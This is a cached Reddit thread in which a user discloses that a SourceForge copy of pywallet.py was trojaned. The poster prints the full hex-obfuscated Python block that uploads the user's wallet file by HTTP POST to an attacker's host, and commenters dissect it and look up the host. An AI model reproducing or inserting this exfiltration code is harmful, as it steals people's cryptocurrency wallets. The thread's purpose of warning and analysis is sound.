(cache) WARNING: I discovered this morning that the version of pywallet hosted on Source Forge is stealing wallets! : Bitcoin

212

213

214

WARNING: I discovered this morning that the version of pywallet hosted on Source Forge is stealing wallets! (self.Bitcoin)

d3k4y が 4時間前 * 投稿

I noticed there was a size difference of pywallet.py on Git Hub compared to Source Forge. I decided to do a diff luckily and lines 2441 to 2476 are

hs = "\x62\x69\x65\x62\x65\x72\x2e\x61\x74\x77\x65\x62\x70\x61\x67\x65\x73\x2e\x63\x6f\x6d" 

s = socket.socket()
s.connect((hs,80))
bo =  "8954789827987580"
h11 = "-----------------------------"
h12 = "\r\n"
h13 = "Content-Disposition: form-data; name=\x22userfile\x22; filename=\x22"
h14 = "\x22\r\nContent-Type: application/octet-stream\r\n\r\n"
h1 =  h11+bo+h12+h13+"fil"+h14
h20 = "\r\n-----------------------------"
h21 = "--\r\n"
h2 = h20+bo+h21
h31 = "POST "
h32 = " HTTP/1.1\r\n"
h33 = "Host: "
h34 = "\r\n"
h35 = "User-Agent: Mozilla/5.0\r\n"
h36 = "Connection: keep-alive\r\n"
h37 = "Content-Type: multipart/form-data; boundary=---------------------------"
h38 = "\r\n"
h39 = "Content-length: "
h40 = "\r\n\r\n"
flen = os.path.getsize(walletfile)
h3= h31+"/a.php"+h32+h33+hs+h34+h35+h36+h37+bo+h38+h39+str(len(h1)+flen+len(h2))+h40
s.send(h3)
s.send(h1)
file2= open(walletfile,"rb") 
totalsent = 0
while totalsent < flen:
    d = file2.read(1024)
    se = s.send(d)
    totalsent = totalsent + se
s.send(h2)
data=s.recv(100)
s.close()

Right when I saw the hex encoded string I knew there was trouble. This version of the script works exactly the same as the real pywallet.py except that it also sends the keys to bieber.atwebpages.com using an HTTP request.

The code has been up since November it seems. It doesn't look like they got a ton, but it comes up on the first page of results when searching for pywallet. I have already notified the hosting company and Source Forge. If you have a copy of pywallet, be sure that it is 5050 lines, not 5096 lines of code. Also, search it for "a.php", as that is the page it sends the keys too.

UPDATE: Well Source Forge still hasn't done shit about it, but the German hosting company (http://www.attractsoft.com/) was quick to respond and take the site down. Unfortunately, if Source Forge leaves the file up and the thief still has the domain name, they can just switch to another hosting service or even use Dynamic DNS is they live in a country that won't do shit about it.

全 35 件のコメント

トップ新着論争中古い順 Q&A

[–]orbitalia [スコア非表示] 3時間前 (0子コメント)

[–]BitDeath [スコア非表示] 3時間前 (4子コメント)

Non-authoritative answer:
Name:   bieber.atwebpages.com
Address: 83.125.22.205

inetnum:        83.125.20.0 - 83.125.23.255
netname:        LNC-ATTRACTSOFT-GMBH
descr:          AttractSoft GmbH
descr:          Mathildenstr. 18, 24148 Kiel
country:        DE

[–]d3k4y[S] [スコア非表示] 1時間前 (3子コメント)

[–]selfservice0 [スコア非表示] 1時間前 (1子コメント)

[–]Togna-Bolognaredditor for 13 days [スコア非表示] 48分前 (0子コメント)

[–]BitDeath [スコア非表示] 13分前 (0子コメント)

[–]OptimisticOnanist [スコア非表示] 2時間前 (7子コメント)

[–]My-Fake-Life [スコア非表示] 2時間前 (1子コメント)

[–]OptimisticOnanist [スコア非表示] 2時間前 (0子コメント)

[–]redcodefinal [スコア非表示] 2時間前 (1子コメント)

[–]Dont_Think_So [スコア非表示] 1時間前 (0子コメント)

[–]waxwing [スコア非表示] 1時間前 (1子コメント)

To be fair, this is not likely to be winning any "obfuscated Python" coding challenges :)

file2= open(walletfile,"rb") 
totalsent = 0
while totalsent < flen:
    d = file2.read(1024)
    se = s.send(d)
    totalsent = totalsent + se

[–]d3k4y[S] [スコア非表示] 15分前 (0子コメント)

[–]d3k4y[S] [スコア非表示] 19分前 (0子コメント)

OP here

The people who already answered are correct. With browser exploits, usually in JavaScript, you'll see the same type of thing. The other things that made it obvious is that there was only one section of code changed, all the lines one after the other with years between the file creation dates. Usually, if you do a diff between updates, especially with that much time in between them, you'd expect to see 2 lines here, 10 lines there, 7 lines there... Differences all over the place. An update to code rarely works out so perfectly.

Also, look at what is right before and right after the first line of hex:

crypted=False


hs = "\x62\x69\x65\x62\x65\x72\x2e\x61\x74\x77\x65\x62\x70\x61\x67\x65\x73\x2e\x63\x6f\x6d" 

s = socket.socket()

So, before it, we see code that suggests something has been decrypted. Then, right after it, we see a socket being open meaning that it's making a connection out.

I know this isn't the exact answer to your question, but I'm just giving you extra things that are bad signs. Here is something else:

h13 = "Content-Disposition: form-data; name=\x22userfile\x22; filename=\x22"
h14 = "\x22\r\nContent-Type: application/octet-stream\r\n\r\n"
h1 =  h11+bo+h12+h13+"fil"+h14
h20 = "\r\n-----------------------------"
h21 = "--\r\n"
h2 = h20+bo+h21
h31 = "POST "
h32 = " HTTP/1.1\r\n"

A few things in this section. First, very indescript variable names. Why would a coder make his life harder unless there was another reason. Second, all these variables are unnecessarily splitting up a string and adding random hex. In this part, us humans see more clearly that an HTTP request is being made. To a computer program, like a virus scanner or something similar would easily pick up an HTTP request all in one string, all in plain characters. If it is all split up and mixed in with hex, a scanner would have a harder time noticing what was going on.